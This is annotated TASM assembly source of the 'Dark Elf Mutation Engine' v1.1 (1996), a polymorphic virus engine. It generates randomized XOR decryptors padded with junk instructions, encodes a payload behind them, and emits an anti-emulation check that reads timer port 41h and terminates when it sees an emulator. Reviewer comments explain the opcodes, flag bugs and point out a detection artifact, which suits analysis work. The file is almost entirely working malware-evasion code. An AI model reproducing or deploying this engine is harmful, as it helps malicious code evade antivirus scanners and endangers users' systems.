; Dark Elf Mutation Engine [DEME] v1.1  CopyLeft (cl) MSTUdent 1996

;
; Routines in this file:
;   DEME      - the Mutation Engine itself (entry point)
;   Randomize - seeds the generator from port 40h
;   RND       - AX = RND(65536)
PUSHSTATE                   ; save assembler state (mode, LOCALS); POPSTATE at the end of the file restores it
IDEAL                       ; TASM IDEAL-mode syntax: proc/endp, multi-register push/pop, [var] memory operands
LOCALS @@                   ; labels starting with @@ are private to the enclosing proc
DEME_MaxDecoderLen=1500     ; advertised upper bound on the generated decryptor size; nothing below checks against it
proc DEME
;-----------------------------------------------------------------------
; Mutation-engine entry point: writes a freshly generated decryptor to
; es:di and, directly behind it, the caller's code XOR-encoded with a
; rolling key (DEME_Encode). When the output runs at the given origin,
; the decryptor decodes the body in place and falls through into it.
; In:  es:di - output buffer (the original header sizes it as source
;              length + 1500, see DEME_MaxDecoderLen)
;      ds:si - source code to encode
;      dx    - load offset (ORG) the output will run at
;      bx    - source length in bytes (rounded up to whole words)
; Out: cx    - bytes written (decryptor + encoded body)
;      bx, si, di, ds and the flags are restored here; the generator
;      routines save and restore every other register they use
; Uses: the DEME_* variables at the end of the file, reached through
;       ds = cs while generating
; NOTE(review): DEME_MaxDecoderLen is never enforced. Counting the
;   DEME_GenRandomSeq call sites of one full run (22, each up to 16
;   junk instructions of up to 4 bytes) plus up to 64 epilog junk
;   instructions, the worst case appears to exceed 1500 bytes; confirm
;   before relying on the +1500 buffer sizing.
;-----------------------------------------------------------------------
pushf
push bx di si ds
push cs
pop ds                      ; ds = cs: the engine's variables live in the code segment
cld                         ; all emission is forward stosb/stosw
inc bx
shr bx,1                    ; bx = number of 16-bit words to process (rounds up)
mov [DEME_CodeLen],bx
mov [DEME_Origin],dx
mov [DEME_BuffOffs],di      ; start of the output, needed to turn di into a runtime offset
call Randomize
call DEME_ChooseRegs        ; pick index / counter / key registers
call DEME_GenProlog         ; junk, anti-emulation check, register loads
call DEME_GenCrypt          ; the decrypt loop
call DEME_GenEpilog         ; trailing junk, patch the body address into the index load
pop ds si                   ; caller's ds:si back: the body is read from there
call DEME_Encode
mov cx,di
pop di bx
sub cx,di                   ; cx = total bytes written
popf
ret
endp DEME
; Register numbers as they appear in the reg / rm fields of the emitted opcodes.
R_AX=00000000b
R_CX=00000001b
R_DX=00000010b
R_BX=00000011b
R_SP=00000100b
R_BP=00000101b
R_SI=00000110b
R_DI=00000111b
; One-bit-per-register masks for DEME_MaskUsed (bit n = register n).
M_AX=00000001b
M_CX=00000010b
M_DX=00000100b
M_BX=00001000b
M_SP=00010000b
M_BP=00100000b
M_SI=01000000b
M_DI=10000000b
M_INDEX=M_BX+M_SI+M_DI      ; registers usable as a plain [reg] memory operand in the emitted xor
M_ALL=M_AX+M_CX+M_DX+M_BX+M_BP+M_SI+M_DI ; every general register except sp
; Identification strings carried in the engine body (useful as a static marker).
DEME_ID db '[DEME] Dark Elf Mutation Engine v1.1',0
DEME_CopyLeft db 'CopyLeft (cl) MSTUdent',0
DEME_Date db ??date,0,??time,0 ; TASM build date and time
proc DEME_Encode near
; Copies DEME_CodeLen words from ds:si to es:di, XOR-ing each with a
; rolling key: the key starts at DEME_Key and DEME_KeyAdd is added after
; every word. This mirrors the loop emitted by DEME_GenCrypt (xor first,
; then the key step), so the decryptor undoes it exactly.
; In:  ds:si source, es:di destination; DEME_CodeLen/Key/KeyAdd set by the generators
; Out: di advanced past the encoded data; all other registers restored
; NOTE(review): DEME restores the caller's ds before calling this, so the
;   [DEME_*] loads below reach the engine's variables only if the
;   enclosing file's ASSUME makes the assembler emit cs: overrides -
;   confirm against the including source.
; NOTE(review): with DEME_CodeLen = 0 the `loop` runs 65536 times.
push ax bx cx dx si
mov cx,[DEME_CodeLen]
mov dx,[DEME_Key]
@@1:
lodsw
xor ax,dx
stosw
add dx,[DEME_KeyAdd]        ; same step the decryptor applies (value is negated when it emits sub)
loop @@1
pop si dx cx bx ax
ret
endp DEME_Encode
proc DEME_ChooseRegs near
; Chooses three distinct registers for the decryptor and marks them in
; DEME_MaskUsed so the junk generators never modify them:
;   DEME_RegIndex   - points at the word being decoded; bx, si or di
;                     only, because the emitted xor uses a [reg] operand
;   DEME_RegCounter - remaining word count
;   DEME_RegKey     - current xor key
; sp is pre-marked so it is never handed out. Preserves ax.
push ax
mov [DEME_MaskUsed],M_SP    ; fresh mask: only sp is off limits so far
mov al,M_INDEX
call DEME_GetAnyReg         ; marks the chosen register in DEME_MaskUsed
mov [DEME_RegIndex],ax
mov al,M_ALL
call DEME_GetAnyReg
mov [DEME_RegCounter],ax
mov al,M_ALL
call DEME_GetAnyReg
mov [DEME_RegKey],ax
pop ax
ret
endp DEME_ChooseRegs
proc DEME_GenProlog near
; Emits the decryptor prolog: junk, the anti-emulation check, then the
; three register loads (index, key, counter) in a random order with
; junk between them. bx/cx/dx carry the loader addresses and
; DEME_MixRegs shuffles them before the calls.
push ax bx cx dx
call DEME_GenRandomSeq
call DEME_GenAntiWeb
mov bx,offset DEME_GenLoadIndex
mov cx,offset DEME_GenLoadKey
mov dx,offset DEME_GenLoadCounter
call DEME_MixRegs           ; random permutation of bx, cx, dx
call DEME_GenRandomSeq
call bx                     ; first loader
call DEME_GenRandomSeq
call dx                     ; second loader
call DEME_GenRandomSeq
call cx                     ; third loader
call DEME_GenRandomSeq
pop dx cx bx ax
ret
endp DEME_GenProlog
proc DEME_GenAntiWeb
; Emits an anti-emulation check into the decryptor. The generated code
; reads I/O port 41h (PC timer chip, channel 1) twice with junk in
; between; if both reads are equal - a timer that does not advance, as
; in a simple code emulator - it terminates via INT 21h / AH=4Ch,
; otherwise it continues. Emitted bytes, junk omitted:
;   [50]  push ax          only when ax is one of the chosen registers
;   E4 41 in al,41h
;   88 C4 mov ah,al
;   E4 41 in al,41h
;   30 C4 xor ah,al
;   75 xx jne skip         xx patched below; no junk between xor and jne
;   B4 4C mov ah,4Ch
;   CD 21 int 21h
;   [58]  pop ax
; ax is marked used for the duration so junk does not clobber al/ah.
; The name suggests it targets a particular scanner's emulator; which
; one is not identifiable from here. For detection, the paired port-41h
; reads followed by INT 21h/4Ch are a stable artifact of this engine.
push ax bx cx
mov cl,[DEME_MaskUsed]      ; cl = mask to restore at the end
test cl,M_AX
je @@1                      ; ax not reserved by the decryptor: nothing to save
mov al,050h                 ; push ax
stosb
call DEME_GenRandomSeq
@@1:
or [DEME_MaskUsed],M_AX     ; borrow ax: keep junk off it
mov ax,41e4h                ; E4 41: in al,41h
stosw
call DEME_GenRandomSeq
mov ax,1100010010001000b    ; 88 C4: mov ah,al
stosw
call DEME_GenRandomSeq
mov ax,41e4h                ; E4 41: in al,41h (second read)
stosw
call DEME_GenRandomSeq
mov ax,1100010000110000b    ; 30 C4: xor ah,al  (ZF set when both reads are equal)
stosw
mov al,01110101b            ; 75 xx: jne; ah still holds C4, a placeholder displacement
stosw
mov bx,di                   ; bx = end of the jne, base for its rel8
call DEME_GenRandomSeq
mov ax,4cb4h                ; B4 4C: mov ah,4Ch
stosw
mov ax,21cdh                ; CD 21: int 21h - terminate process
stosw
call DEME_GenRandomSeq
mov ax,di
sub ax,bx
mov [es:bx-1],al            ; patch the jne displacement to skip the exit
test cl,M_AX
je @@2
mov al,058h                 ; pop ax
stosb
call DEME_GenRandomSeq
@@2:
mov [DEME_MaskUsed],cl      ; give ax back
pop cx bx ax
ret
endp DEME_GenAntiWeb
proc DEME_GenLoadIndex near
; Emits `mov index_reg, imm16` (B8+r) with a placeholder immediate and
; records the immediate's position in DEME_AddrBeg. DEME_GenEpilog
; patches in the runtime offset of the encoded body once its position
; is known.
push ax
mov ax,[DEME_RegIndex]
or al,10111000b             ; B8 + register number
stosb
mov [DEME_AddrBeg],di       ; where the imm16 lives
stosw                       ; placeholder (whatever ax holds), patched later
pop ax
ret
endp DEME_GenLoadIndex
proc DEME_GenLoadKey near
; Draws a random 16-bit xor key, stores it in DEME_Key for DEME_Encode
; and emits `mov key_reg, key`.
push ax bx
call RND
mov bx,ax                   ; bx = immediate for DEME_GenLoadReg16
mov [DEME_Key],ax
mov ax,[DEME_RegKey]        ; ax = register for DEME_GenLoadReg16
call DEME_GenLoadReg16
pop bx ax
ret
endp DEME_GenLoadKey
proc DEME_GenLoadCounter near
; Emits `mov counter_reg, DEME_CodeLen` (word count of the body).
push ax bx
mov ax,[DEME_RegCounter]
mov bx,[DEME_CodeLen]
call DEME_GenLoadReg16
pop bx ax
ret
endp DEME_GenLoadCounter
proc DEME_GenCrypt near
; Emits the decrypt loop (junk between every step):
;   loop: xor [cs:index], key                      ; DEME_GenXorCmd, always first
;         key += KeyAdd / index += 2 / counter -= 1 ; these three in random order
;         exit test, jump out, jmp loop            ; DEME_GenCloseCycle
; The xor must come before the key update to mirror DEME_Encode.
; Records the loop start in DEME_LoopAddr for the back-jump.
push ax bx cx dx
mov [DEME_LoopAddr],di
call DEME_GenRandomSeq
call DEME_GenXorCmd
mov dx,offset DEME_GenIncIndex
mov bx,offset DEME_GenAddKey
mov cx,offset DEME_GenDecCounter
call DEME_MixRegs           ; random permutation of bx, cx, dx
call DEME_GenRandomSeq
call bx
call DEME_GenRandomSeq
call dx
call DEME_GenRandomSeq
call cx
call DEME_GenRandomSeq
call DEME_GenCloseCycle
call DEME_GenRandomSeq
pop dx cx bx ax
ret
endp DEME_GenCrypt
proc DEME_GenXorCmd near
; Emits `xor word [cs:index_reg], key_reg` as 2E 31 /r with mod=00:
;   rm = 111 for [bx], 100 for [si], 101 for [di]; reg = key register.
; DEME_RegIndex is always one of bx/si/di (see DEME_ChooseRegs), so one
; of the three compares below matches.
push ax bx
mov al,2eh                  ; cs: segment override
stosb
mov al,00110001b            ; 31: xor r/m16, r16
stosb
mov bx,[DEME_RegIndex]
cmp bx,R_BX
jne @@1
mov al,00000111b            ; rm=111 -> [bx]
@@1:
cmp bx,R_SI
jne @@2
mov al,00000100b            ; rm=100 -> [si]
@@2:
cmp bx,R_DI
jne @@3
mov al,00000101b            ; rm=101 -> [di]
@@3:
mov bx,[DEME_RegKey]
shl bl,3                    ; key register into the reg field
or al,bl
stosb
pop bx ax
ret
endp DEME_GenXorCmd
proc DEME_GenIncIndex near
; Emits one of four equivalent ways of advancing the index register by
; 2 (one word), chosen at random:
;   0: inc r / inc r           40+r, twice
;   1: add r, 2                81 /0 iw
;   2: sub r, -2               81 /5 iw
;   3: mov tmp, 2 / add r, tmp B8+tmp iw, 01 /r  (tmp from DEME_GetUnusedReg;
;      nothing is emitted between the two, so tmp need not stay reserved)
push ax bx
mov bx,[DEME_RegIndex]
call RND
and ax,3
or al,al
jne @@1
mov al,01000000b            ; 40+r: inc r16
or al,bl
stosb
stosb                       ; twice: +2
jmp @@Exit
@@1:
dec al
jne @@2
mov al,10000001b            ; 81: op r/m16, imm16
stosb
mov al,11000000b            ; mod=11, /0 = add
or al,bl
stosb
mov ax,2
stosw
jmp @@Exit
@@2:
dec al
jne @@3
mov al,10000001b            ; 81: op r/m16, imm16
stosb
mov al,11101000b            ; mod=11, /5 = sub
or al,bl
stosb
mov ax,-2
stosw
jmp @@Exit
@@3:
call DEME_GetUnusedReg      ; al = scratch register not in DEME_MaskUsed
mov bx,2
call DEME_GenLoadReg16      ; mov tmp, 2
mov bx,[DEME_RegIndex]
mov bh,al
shl bh,3                    ; bh = tmp in the reg field
mov al,00000001b            ; 01: add r/m16, r16
stosb
mov al,11000000b            ; mod=11, rm=index, reg=tmp
or al,bl
or al,bh
stosb
@@Exit:
pop bx ax
ret
endp DEME_GenIncIndex
proc DEME_GenAddKey near
; Emits the per-word key step as `add key, K` (81 /0) or `sub key, K`
; (81 /5) with a random K. K is stored in DEME_KeyAdd for DEME_Encode;
; when sub is emitted the stored value is negated so the encoder's add
; performs the identical step. The @@Exit label is unused.
push ax bx
mov bx,[DEME_RegKey]
call RND
mov [DEME_KeyAdd],ax
push ax                     ; the immediate that will be emitted
call RND
xor ah,ah                   ; ah = 0 -> add form
test al,00000100b
je @@1
neg [DEME_KeyAdd]           ; decryptor subtracts, so the encoder must add -K
mov ah,00101000b            ; flips /0 into /5 = sub
@@1:
mov al,10000001b            ; 81: op r/m16, imm16
stosb
mov al,11000000b            ; mod=11, rm=key register
xor al,ah
or al,bl
stosb
pop ax
stosw                       ; imm16 = original K
@@Exit:
pop bx ax
ret
endp DEME_GenAddKey
proc DEME_GenDecCounter near
; Emits one of four equivalent ways of decrementing the counter register
; by 1, chosen at random:
;   0: dec r                   48+r
;   1: add r, -1               81 /0 iw
;   2: sub r, 1                81 /5 iw
;   3: mov tmp, 1 / sub r, tmp B8+tmp iw, 29 /r  (tmp from DEME_GetUnusedReg)
push ax bx
mov bx,[DEME_RegCounter]
call RND
and ax,3
or al,al
jne @@1
mov al,01001000b            ; 48+r: dec r16
or al,bl
stosb
jmp @@Exit
@@1:
dec al
jne @@2
mov al,10000001b            ; 81: op r/m16, imm16
stosb
mov al,11000000b            ; mod=11, /0 = add
or al,bl
stosb
mov ax,-1
stosw
jmp @@Exit
@@2:
dec al
jne @@3
mov al,10000001b            ; 81: op r/m16, imm16
stosb
mov al,11101000b            ; mod=11, /5 = sub
or al,bl
stosb
mov ax,1
stosw
jmp @@Exit
@@3:
call DEME_GetUnusedReg      ; al = scratch register not in DEME_MaskUsed
mov bx,1
call DEME_GenLoadReg16      ; mov tmp, 1
mov bx,[DEME_RegCounter]
mov bh,al
shl bh,3                    ; bh = tmp in the reg field
mov al,00101001b            ; 29: sub r/m16, r16
stosb
mov al,11000000b            ; mod=11, rm=counter, reg=tmp
or al,bl
or al,bh
stosb
@@Exit:
pop bx ax
ret
endp DEME_GenDecCounter
proc DEME_GenCloseCycle near
; Emits the loop exit test and the back-jump:
;   compare on the counter      (DEME_Clos1Tbl[variant])
;   optionally pushf / junk / popf, so the junk cannot disturb the flags
;   conditional short jump out  (DEME_Clos2Tbl[variant], rel8 patched at the end)
;   junk, jmp near loop start   (DEME_ClosJmp), junk
;   then DEME_ClosJmpShort points the short jump here, past the back-jump.
; bx keeps variant*2 across the calls (the callees preserve it).
push ax bx cx dx
call RND
and ax,3
shl ax,1
mov bx,ax                   ; bx = word index into both tables
call [DEME_Clos1Tbl+bx]
call RND
test al,1
je @@1
mov al,10011100b            ; 9C: pushf
stosb
call DEME_GenRandomSeq
mov al,10011101b            ; 9D: popf
stosb
@@1:
call [DEME_Clos2Tbl+bx]
call DEME_GenRandomSeq
call DEME_ClosJmp
call DEME_GenRandomSeq
call DEME_ClosJmpShort
call DEME_GenRandomSeq
pop dx cx bx ax
ret
endp DEME_GenCloseCycle
; Exit-test variants, indexed by variant*2. Each Clos1 entry pairs with
; the Clos2 entry at the same index.
DEME_Clos1Tbl dw offset DEME_Clos11 ; cmp counter, 0
dw offset DEME_Clos12               ; cmp counter, 1
dw offset DEME_Clos13               ; or counter, counter
dw offset DEME_Clos14               ; test counter, 0FFFFh
DEME_Clos2Tbl dw offset DEME_Clos21 ; je  (counter == 0)
dw offset DEME_Clos22               ; jb  (unsigned below 1, i.e. counter == 0)
dw offset DEME_Clos21               ; je
dw offset DEME_Clos21               ; je
proc DEME_Clos11 near
; Emits `cmp counter, 0` (81 /7 iw).
push ax bx
mov al,10000001b            ; 81: op r/m16, imm16
stosb
mov ax,[DEME_RegCounter]
or al,11111000b             ; mod=11, /7 = cmp, rm=counter
stosb
xor ax,ax
stosw                       ; imm16 = 0
pop bx ax
ret
endp DEME_Clos11
proc DEME_Clos12 near
; Emits `cmp counter, 1` (81 /7 iw); paired with jb in DEME_Clos2Tbl.
push ax bx
mov al,10000001b            ; 81: op r/m16, imm16
stosb
mov ax,[DEME_RegCounter]
or al,11111000b             ; mod=11, /7 = cmp, rm=counter
stosb
xor ax,ax
inc ax
stosw                       ; imm16 = 1
pop bx ax
ret
endp DEME_Clos12
proc DEME_Clos13 near
; Emits `or counter, counter` (09 /r with reg = rm = counter); sets ZF
; when the counter is zero.
push ax bx
mov al,00001001b            ; 09: or r/m16, r16
stosb
mov ax,[DEME_RegCounter]
mov ah,11000000b            ; mod=11
or ah,al                    ; rm = counter
shl al,3                    ; reg = counter
or al,ah
stosb
pop bx ax
ret
endp DEME_Clos13
proc DEME_Clos14 near
; Emits `test counter, 0FFFFh` (F7 /0 iw); sets ZF when the counter is zero.
push ax bx
mov al,11110111b            ; F7: group 3
stosb
mov ax,[DEME_RegCounter]
or al,11000000b             ; mod=11, /0 = test, rm=counter
stosb
xor ax,ax
dec ax
stosw                       ; imm16 = 0FFFFh
pop bx ax
ret
endp DEME_Clos14
proc DEME_Clos21 near
; Emits `je rel8` (74 xx) with a placeholder displacement and records
; its position in DEME_JmpShort for DEME_ClosJmpShort.
push ax
mov al,01110100b            ; 74: je
stosb
mov [DEME_JmpShort],di      ; where the rel8 lives
stosb                       ; placeholder byte (74h again)
pop ax
ret
endp DEME_Clos21
proc DEME_Clos22 near
; Emits `jb rel8` (72 xx) with a placeholder displacement and records
; its position in DEME_JmpShort for DEME_ClosJmpShort.
push ax
mov al,01110010b            ; 72: jb
stosb
mov [DEME_JmpShort],di      ; where the rel8 lives
stosb                       ; placeholder byte (72h again)
pop ax
ret
endp DEME_Clos22
proc DEME_ClosJmp near
; Emits `jmp near DEME_LoopAddr` (E9 rel16). The displacement is
; relative to the end of the 3-byte instruction: after the opcode is
; stored di points at the rel16 field, so rel = LoopAddr - di - 2.
push ax
mov al,11101001b            ; E9: jmp rel16
stosb
mov ax,[DEME_LoopAddr]
sub ax,di
dec ax
dec ax                      ; account for the two displacement bytes
stosw
pop ax
ret
endp DEME_ClosJmp
proc DEME_ClosJmpShort near
; Patches the short jump recorded in DEME_JmpShort so it lands at the
; current di: rel8 = di - (JmpShort + 1), the distance from the end of
; the 2-byte jcc. The displacement is stored as a single byte without
; any range check.
push ax bx
mov ax,di
mov bx,[DEME_JmpShort]
sub ax,bx
dec ax
mov [es:bx],al
pop bx ax
ret
endp DEME_ClosJmpShort
proc DEME_GenEpilog near
; Emits 1..64 junk instructions after the loop, then patches the
; immediate of the `mov index, imm16` emitted by DEME_GenLoadIndex with
; the runtime offset of the encoded body: di - DEME_BuffOffs + DEME_Origin.
; DEME_Encode writes the body right here, so the decryptor falls through
; into the decoded code.
push ax bx dx
call RND
and ax,3fh
inc ax                      ; ax = 1..64
@@1:
call DEME_GenTrash
dec ax
jnz @@1
mov bx,[DEME_AddrBeg]       ; position of the placeholder imm16
mov dx,di
sub dx,[DEME_BuffOffs]      ; offset within the output buffer
add dx,[DEME_Origin]        ; ... made absolute for the load address
mov [es:bx],dx
pop dx bx ax
ret
endp DEME_GenEpilog
proc DEME_MixRegs near
; Randomly permutes bx, cx and dx with three independent conditional
; swaps driven by bits 0-2 of one RND value. Used to randomize the
; order in which generator routines are called. Preserves ax.
push ax
call RND
test al,1
je @@1
xchg bx,cx
@@1:
test al,2
je @@2
xchg cx,dx
@@2:
test al,4
je @@3
xchg bx,dx
@@3:
pop ax
ret
endp DEME_MixRegs
proc Randomize near
; Seeds RND: reads a 16-bit value from I/O port 40h (the PC timer chip)
; into Seed1. Direct port access only works with I/O privilege, i.e.
; real-mode DOS; the label is written Seed1 below and relies on
; case-insensitive symbol resolution.
push ax
in ax,40h
mov [seed1],ax
pop ax
ret
endp Randomize
proc RND near
; Returns a 16-bit pseudo-random value in ax and advances Seed:
;   t = Seed xor Seed1; dx:ax = t*t; al = dl; Seed = ax
; i.e. the low word of the square with its low byte replaced by the low
; byte of the high word. Not a cryptographic generator. Clobbers flags;
; dx is preserved. If Seed and Seed1 are both 0 the output stays 0.
push dx
mov ax,[seed]
xor ax,[seed1]
mul ax                      ; dx:ax = ax * ax
mov al,dl
mov [seed],ax
pop dx
ret
endp RND
; ---- junk (trash) instruction generation ----
proc DEME_GenRandomSeq near
; Emits a run of 1..16 junk instructions (DEME_GenTrash). Preserves ax.
push ax
call RND
and ax,0fh
inc ax                      ; ax = 1..16
@@1:
call DEME_GenTrash
dec ax
jnz @@1
pop ax
ret
endp DEME_GenRandomSeq
proc DEME_GenTrash near
; Emits one junk instruction by dispatching to a random entry of
; DEME_TrashTbl (four generators; DEME_GenCmd1 currently emits nothing).
push ax bx
call RND
and ax,3
shl ax,1
mov bx,ax                   ; bx = word index into the table
call [DEME_TrashTbl+bx]
pop bx ax
ret
endp DEME_GenTrash
; Junk generators, indexed by variant*2 from DEME_GenTrash.
DEME_TrashTbl dw offset DEME_GenCmd1 ; 1-byte ax ops (disabled by an early ret)
dw offset DEME_GenCmd2               ; 2-byte single-register ops
dw offset DEME_GenCmd3               ; 4-byte reg, imm16 ops
dw offset DEME_GenCmd4               ; 2-byte reg, reg ops
proc DEME_GenCmd1 near
; Would emit one single-byte instruction that modifies ax (table
; DEME_Cmds1), only when ax is not a chosen register. The `ret` right
; below disables it: everything after it is unreachable, so variant 0
; of DEME_GenTrash emits nothing. Presumably switched off on purpose.
ret
push ax bx                  ; unreachable from here on
test [DEME_MaskUsed],M_AX
jne @@Exit                  ; ax is reserved: emit nothing
call RND
and ax,7
mov bx,ax
mov al,[DEME_Cmds1+bx]
stosb
@@Exit:
pop bx ax
ret
endp DEME_GenCmd1
; Single-byte instructions for DEME_GenCmd1; every one writes ax (or ah).
DEME_Cmds1 db 00110111b ;aaa
db 00111111b ;aas
db 10011000b ;cbw
db 00100111b ;daa
db 00101111b ;das
db 01001000b ;dec ax
db 01000000b ;inc ax
db 10011111b ;lahf
proc DEME_GenCmd2 near
; Emits one 2-byte single-operand instruction from DEME_Cmds2 on a
; register not in DEME_MaskUsed: opcode, then modrm = table byte
; (mod=11 with the /n already set) | target register in rm.
; The D3 variants shift by cl: they read cl but write only the target.
push ax bx
call RND
and ax,0fh                  ; 16 entries
mov bx,ax
shl bx,1                    ; 2 bytes per entry
mov al,[DEME_Cmds2+bx]
stosb                       ; opcode
mov bl,[DEME_Cmds2+bx+1]    ; modrm template
call DEME_GetUnusedReg      ; al = free register (not reserved afterwards)
or al,bl
stosb                       ; modrm
pop bx ax
ret
endp DEME_GenCmd2
; opcode, modrm template (mod=11, /n); DEME_GenCmd2 fills in rm.
DEME_Cmds2 db 0d1h,11000000b ;rol
db 0d1h,11001000b ;ror
db 0d1h,11010000b ;rcl
db 0d1h,11011000b ;rcr
db 0d1h,11100000b ;shl
db 0d1h,11101000b ;shr
db 0ffh,11000000b ;inc
db 0ffh,11001000b ;dec
db 0f7h,11010000b ;not
db 0f7h,11011000b ;neg
db 0d3h,11000000b ;rol cl
db 0d3h,11001000b ;ror cl
db 0d3h,11010000b ;rcl cl
db 0d3h,11011000b ;rcr cl
db 0d3h,11100000b ;shl cl
db 0d3h,11101000b ;shr cl
proc DEME_GenCmd3 near
; Emits one 4-byte `op reg, imm16` instruction from DEME_Cmds3 with a
; random immediate, on a register not in DEME_MaskUsed. ax is
; additionally marked used for the duration so the target is never ax;
; the original comment gives the reason but is not recoverable here.
; The entry is selected by RND mod 9.
push ax bx
mov al,[DEME_MaskUsed]
push ax                     ; saved mask
or [DEME_MaskUsed],M_AX     ; exclude ax from the choice below
call RND
xor ah,ah
mov bl,9
div bl                      ; ah = remainder 0..8
mov bl,ah
xor bh,bh
shl bx,1                    ; 2 bytes per entry
mov al,[DEME_Cmds3+bx]
stosb                       ; opcode
mov bl,[DEME_Cmds3+bx+1]    ; modrm template
call DEME_GetUnusedReg      ; al = free register
or al,bl
stosb                       ; modrm
call RND
stosw                       ; imm16
pop ax
mov [DEME_MaskUsed],al      ; restore the mask
pop bx ax
ret
endp DEME_GenCmd3
; opcode, modrm template (mod=11, /n); DEME_GenCmd3 fills in rm and appends imm16.
DEME_Cmds3 db 081h,11000000b ;add
db 081h,11010000b ;adc
db 081h,11101000b ;sub
db 081h,11110000b ;xor
db 0f7h,11000000b ;test
db 081h,11011000b ;sbb
db 081h,11001000b ;or
db 081h,11111000b ;cmp
db 081h,11100000b ;and
; db 0c7h,11000000b ;mov  (left out by the author; DEME_GenCmd3 divides by 9)
proc DEME_GenCmd4 near
; Emits one 2-byte `op dst, src` register-register instruction: opcode
; from DEME_Cmds4 (all take the written operand in the reg field),
; dst = a register not in DEME_MaskUsed, src = any register (only
; read). The entry is selected by RND mod 10. cx is saved but unused.
push ax bx cx dx
call RND
xor ah,ah
mov bl,10
div bl                      ; ah = remainder 0..9
mov bl,ah
xor bh,bh
mov al,[DEME_Cmds4+bx]
stosb                       ; opcode
call DEME_GetUnusedReg      ; al = free register
shl al,3                    ; into the reg field
mov dl,al
call RND
and al,00000111b            ; random rm register
or al,11000000b             ; mod=11
or al,dl
stosb                       ; modrm
pop dx cx bx ax
ret
endp DEME_GenCmd4
; Opcodes of the form `op r16, r/m16` (destination in the reg field) for DEME_GenCmd4.
DEME_Cmds4 db 003h ;add
db 013h ;adc
db 02bh ;sub
db 033h ;xor
db 085h ;test
db 01bh ;sbb
db 00bh ;or
db 03bh ;cmp
db 023h ;and
db 08bh ;mov
proc DEME_GetUnusedReg near
; Returns in ax a register (0..7, never sp) that is not set in
; DEME_MaskUsed, without reserving it: the mask is restored afterwards,
; so the caller may only use the register for code it emits right away.
push bx
mov bl,[DEME_MaskUsed]      ; remember the mask
mov al,M_ALL
call DEME_GetAnyReg
mov [DEME_MaskUsed],bl      ; undo the reservation made by DEME_GetAnyReg
pop bx
ret
endp DEME_GetUnusedReg
proc DEME_GetAnyReg near
; Picks a random register allowed by the mask in al and not set in
; DEME_MaskUsed, marks it in DEME_MaskUsed and returns its number in ax.
; Starts at a random register and walks upward (mod 8) until a free
; one is found; there is no other exit, so if every allowed register is
; already in use this loops forever.
push bx cx
mov bl,al
not bl
or bl,[DEME_MaskUsed]       ; bl = registers that must not be chosen
call RND
and ax,7                    ; al = starting register
mov cl,al
mov ah,1
rol ah,cl                   ; ah = bit for that register
@@11:
test ah,bl
je @@12                     ; free: done
inc al
and al,7
rol ah,1                    ; next register, wrapping at 8
jmp @@11
@@12:
or [DEME_MaskUsed],ah       ; reserve it
and ax,7                    ; ax = register number
pop cx bx
ret
endp DEME_GetAnyReg
proc DEME_GenLoadReg16 near
; Emits `mov r16, imm16` (B8+r iw).
; In: ax - register number (only the low 3 bits are used)
;     bx - immediate value
push ax bx
and al,00000111b
or al,10111000b             ; B8 + register number
stosb
mov ax,bx
stosw                       ; imm16
pop bx ax
ret
endp DEME_GenLoadReg16
; Engine state. Lives in the code segment and is reached with ds = cs
; (or a cs: override supplied by the including file's ASSUME). Seed and
; Seed1 are referenced as [seed]/[seed1] above, relying on
; case-insensitive symbol resolution.
Seed dw 0                   ; RND state
Seed1 dw 0                  ; seed read from port 40h by Randomize
DEME_MaskUsed db 0          ; M_xx bitmask of registers junk code must not modify
DEME_RegIndex dw 0          ; register number of the decryptor's index (bx/si/di)
DEME_RegCounter dw 0        ; register number of the word counter
DEME_RegKey dw 0            ; register number of the xor key
DEME_Origin dw 0            ; load offset (ORG) of the output
DEME_BuffOffs dw 0          ; di at the start of the output
DEME_LoopAddr dw 0          ; di at the start of the decrypt loop
DEME_JmpShort dw 0          ; position of the exit jcc's rel8 byte
DEME_CodeLen dw 0           ; body length in words
DEME_Key dw 0               ; initial xor key
DEME_KeyAdd dw 0            ; per-word key step (as added by DEME_Encode)
DEME_AddrBeg dw 0           ; position of the imm16 in the index-register load
POPSTATE                    ; restore the assembler state saved by PUSHSTATE